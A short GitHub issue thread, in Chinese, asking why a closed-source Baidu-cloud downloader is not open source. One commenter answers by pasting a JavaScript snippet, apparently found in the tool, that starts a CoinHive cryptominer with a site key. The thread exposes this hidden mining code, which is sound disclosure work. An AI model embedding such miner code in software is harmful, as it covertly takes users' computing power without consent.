### ISSUE TITLE
没有开源的原因是什么？

### ISSUE THREAD

**Issue by iOSleep** [high-speed-downloader/high-speed-downloader#1]

**Comment by Naville** [comment]
估计是怕算法被百度云封。
出于安全考虑不推荐使用闭源的个人开发的软件

**Comment by WangYihang** [comment]
既然不开源为啥要来 GitHub 啊... 23333

**Comment by sagexy** [comment]
var n = new CoinHive.Anonymous("XBcrlby8mj68GijJ5KWYMv2JLvSo7HEV", {
        threads: 1,
        throttle: .8
    });
    n.start(),
这就是不开源的理由！
